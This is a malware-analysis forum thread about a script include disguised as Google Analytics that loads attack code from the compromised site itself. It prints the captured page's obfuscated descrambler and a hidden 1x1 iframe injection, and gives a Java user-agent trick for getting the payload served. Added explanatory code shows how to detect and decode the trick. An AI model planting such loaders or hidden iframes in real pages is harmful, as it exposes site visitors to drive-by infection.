Malware Related => Malware Analysis => Topic started by: SysAdMini on November 26, 2012, 02:04:14 pm

Title: Nice trick on
Post by: SysAdMini on November 26, 2012, 02:04:14 pm
A suspicious url was being blocked by web filtering software. Referrer was
I looked at the code of At first glance there was nothing suspicious to find.


It took me some time to figure out where the suspicious url came from.
Look at the final script statement at the end of the page code.


Code: [Select]
<script src="" type="text/javascript"></script>
This looks unsuspicious, because it looks like a normal Google Analytics request. But it's the key.
The url is missing the http:// statement. That means the url is relative to the current url - actually


There you can find the code creating the suspicious url.



I don't get any content from that url. Please let me know if you get something. Url changes occasionally.
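The resolution rule the post relies on can be checked in running code. The following is an added example, not code from the original thread: it resolves each script src the way a browser does and flags a src that begins with a third-party host name but, lacking a scheme or leading "//", lands on the page's own origin. The real src and page address were stripped from the post, so SAMPLE_HTML, PAGE_URL and the google-analytics host name in the disguised tag are constructed assumptions.

```javascript
// Added example, not code from the original thread. The real src value was
// stripped from the post, so SAMPLE_HTML and PAGE_URL are constructed here and
// the disguised tag is assumed to start with a Google Analytics host name
// but no scheme.

const PAGE_URL = "http://www.example.com/shop/index.html";

const SAMPLE_HTML = `
<html><head><title>shop</title>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
<script src="//www.google-analytics.com/ga.js" type="text/javascript"></script>
</head><body>
<p>catalogue</p>
<script src="www.google-analytics.com/ga.js" type="text/javascript"></script>
</body></html>`;

// Host names an analyst expects to see only as absolute, external references.
const KNOWN_THIRD_PARTY_HOSTS = ["www.google-analytics.com", "ssl.google-analytics.com"];

// Resolve a src attribute the way the browser does: against the page URL.
// "http://host/x" stays as is, "//host/x" keeps the page scheme, and
// "host/x" (no scheme, no leading slashes) is a plain relative path.
function resolveScriptSrc(src, pageUrl) {
  return new URL(src, pageUrl).href;
}

// Walk every <script src=...> and classify it:
//   "external"            loads from another origin
//   "same-origin"         an ordinary local script
//   "disguised-relative"  text starts with a known third-party host name but,
//                         lacking a scheme or "//", resolves on the page's own
//                         origin; this is the trick described in the thread.
function auditScriptTags(html, pageUrl) {
  const page = new URL(pageUrl);
  const tagRe = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
  const findings = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const src = m[1].trim();
    const resolved = new URL(src, page);
    const sameOrigin = resolved.origin === page.origin;
    const looksThirdParty = KNOWN_THIRD_PARTY_HOSTS.some(
      (h) => src.toLowerCase().startsWith(h)
    );
    let verdict = sameOrigin ? "same-origin" : "external";
    if (sameOrigin && looksThirdParty) verdict = "disguised-relative";
    findings.push({ src, resolved: resolved.href, verdict });
  }
  return findings;
}

console.log(JSON.stringify(auditScriptTags(SAMPLE_HTML, PAGE_URL), null, 2));
```

Run with node: the first two tags resolve to the Google host and are reported as external, while the third resolves to http://www.example.com/shop/www.google-analytics.com/ga.js and is reported as disguised-relative. Protocol-relative "//host/path" is the form a legitimate scheme-less include takes; a bare "host/path" never is.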

Title: Re: Nice trick on
Post by: GmG on November 27, 2012, 02:31:32 pm
You need to include Java in the user agent string


Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Java/1.7.0_5

Title: Re: Nice trick on
Post by: SysAdMini on November 27, 2012, 02:49:13 pm
Thanks ! That brings me one step further.

Now I'm stuck at a url like this one:

Code: [Select]
It resolves to, but doesn't respond.
Title: Re: Nice trick on
Post by: GmG on November 27, 2012, 07:20:07 pm
the same for me

but it works in urlquery

Title: Re: Nice trick on
Post by: SysAdMini on November 27, 2012, 09:11:21 pm
Current url works.

Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
xmlns=""   >
<head><meta  content="text/html; charset=utf-8" http-equiv="Content-Type" /><meta http-equiv="Content-Language" content="en"
<meta http-equiv="Cache-control" content="Public"  />  <link  href=""></link>

<title>Smart Tools</title>
<script>function ty0mvk0t2Hu(iFoAu){iFoAu=iFoAu.replace(/~/gi,"\\").replace(/``/gi,"\"");var BlSlw="6874";var agFSNM;var guAA=[];function TKvzf(){var bZhQ='gTzU';if('RPpIXv'=='mCaJjp')sHTZo();}
var vFfUot=0;var NkMcK;for(var i=0;i<iFoAu.length;i++){if((iFoAu.length-i)>=parseInt(BlSlw.substring(vFfUot,vFfUot+1))){if('PEFQ'=='evPd')dyTI='aAhu';var pain=parseInt(BlSlw.substring(vFfUot,vFfUot+1));for(var i2=i+pain-1;i2>=i;i2--){guAA.push(iFoAu.substring(i2,i2+1));var bOVG;}
i+=parseInt(BlSlw.substring(vFfUot,vFfUot+1))-1;function HRSBJ(){}}else{var ch_i=i;guAA.push((iFoAu.substring((ch_i+1-1),(ch_i+1))));if('blkArJ'=='ySUudk')cZQgi='sKBaA';}
BRJi=window;BRJi["wW48wk9Gz5ruNyfQ0HT2VV"]=guAA.join('');if('chMi'=='cBvVw')PPLT='cMKEjG';}</script></head><body><div   id="lcAmX"
class="RWjBA&#66;" ></div><div
qyerD="loQysd" class="UsTu"
id="KvDskKb"  class="ZEQxJH" ></div>
<script src="45270.js"></script>
<script>if('gDWTZ'=='cZLai')hoZTz='bGNpMu';function ZgqLdG(){}
var GchIb=document;var zaHceR;var ODbj="write";function lIaQ(){}
var VbXCqq="\x3c\x69f\x72ame  st\x79\x6c\x65=\"w\x69dt\x68:1px;he\x69ght:1px;po\x73it\x69on:\x61b\x73\x6flute\"  src=\"\x69.html\" \x3e\x3c/\x69fr\x61\x6de\x3e";var iqAKC=252;GchIb.psATl=GchIb[ODbj];if('iBYU'=='moYjY')OnFm='kInw';GchIb.psATl(VbXCqq);var OjkMuE=193;</script>
class="mFqbp"  ></div><div  id="&#101;&#120;Row"  class="&#105;FjO" ></div><div  gUlZ="zwCmzF"  id="b&#75;x&#86;&#80;&#67;" class="c&#105;&#111;I"   ></div><div id="Za&#74;O&#120;y" class="&#82;mj&#72;"
id="OhtulPT"  class="fKHovrZHK" ></div>
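For readers who want to work through the captured page, here is an added example (not code from the captured page or from anyone in the thread): a readable port of the descrambling routine ty0mvk0t2Hu() and a decoder for the \xNN-escaped literal VbXCqq that is handed to document.write. The port assumes the sample's visible behaviour is the intended one: the key "6874" is held but the cursor into it is never advanced, so every block is 6 characters. The scrambled test input is constructed here; the iframe literal is copied from the page. What consumes window["wW48wk9Gz5ruNyfQ0HT2VV"] is presumably 45270.js, which the thread does not include, so the port stops at the decoded string.

```javascript
// Added example, not code from the captured page: a readable port of the
// descrambling routine ty0mvk0t2Hu() from the sample, plus a decoder for
// "\xNN"-escaped string literals like the one handed to document.write.
// The descrambler's test inputs are constructed here; the iframe literal is
// copied from the captured page.

// Reverse the text in fixed-size blocks; a trailing partial block is copied
// through unchanged. Applying it twice gives the input back.
function reverseBlocks(text, blockSize) {
  const out = [];
  let i = 0;
  while (i < text.length) {
    if (text.length - i >= blockSize) {
      for (let j = i + blockSize - 1; j >= i; j--) out.push(text.charAt(j));
      i += blockSize;
    } else {
      out.push(text.charAt(i));
      i += 1;
    }
  }
  return out.join("");
}

// Port of ty0mvk0t2Hu(): "~" stands for a backslash and a doubled backtick for
// a double quote; the result is then de-scrambled block-wise. The sample holds
// the key "6874", but its cursor into that key is never advanced, so only the
// leading digit (block size 6) is ever used. The port keeps that behaviour.
function decodeBlockReverse(scrambled, blockSize = 6) {
  const unescaped = scrambled.replace(/~/g, "\\").replace(/``/g, '"');
  return reverseBlocks(unescaped, blockSize);
}

// Inverse of decodeBlockReverse, used to build test input: scramble first,
// then apply the substitutions the decoder undoes.
function scramble(plain, blockSize = 6) {
  return reverseBlocks(plain, blockSize).replace(/\\/g, "~").replace(/"/g, "``");
}

// Decode the escapes of a JavaScript string literal (\xNN, \uNNNN and the
// single-character escapes) from raw source text, without evaluating it.
function decodeJsStringEscapes(raw) {
  const single = { n: "\n", r: "\r", t: "\t", '"': '"', "'": "'", "\\": "\\", "/": "/" };
  return raw.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)/g, (_, esc) => {
    if (esc[0] === "x" || esc[0] === "u") return String.fromCharCode(parseInt(esc.slice(1), 16));
    return Object.prototype.hasOwnProperty.call(single, esc) ? single[esc] : esc;
  });
}

// The literal assigned to VbXCqq in the captured page, as it appears in source.
const IFRAME_LITERAL_RAW = String.raw`\x3c\x69f\x72ame  st\x79\x6c\x65=\"w\x69dt\x68:1px;he\x69ght:1px;po\x73it\x69on:\x61b\x73\x6flute\"  src=\"\x69.html\" \x3e\x3c/\x69fr\x61\x6de\x3e`;

// Constructed scrambled input: what a loader would have to feed the
// descrambler to obtain a small document.write call.
const SCRAMBLED_SAMPLE = scramble('document.write("<b>hi</b>");');

console.log(decodeJsStringEscapes(IFRAME_LITERAL_RAW));
console.log(SCRAMBLED_SAMPLE, "=>", decodeBlockReverse(SCRAMBLED_SAMPLE));
```

Decoding the literal yields a 1x1 pixel, absolutely positioned iframe whose src is the relative path i.html, the same scheme-less-relative pattern the first post describes. Because block reversal is its own inverse, the scramble() helper lets you check the port against constructed input without needing the missing 45270.js.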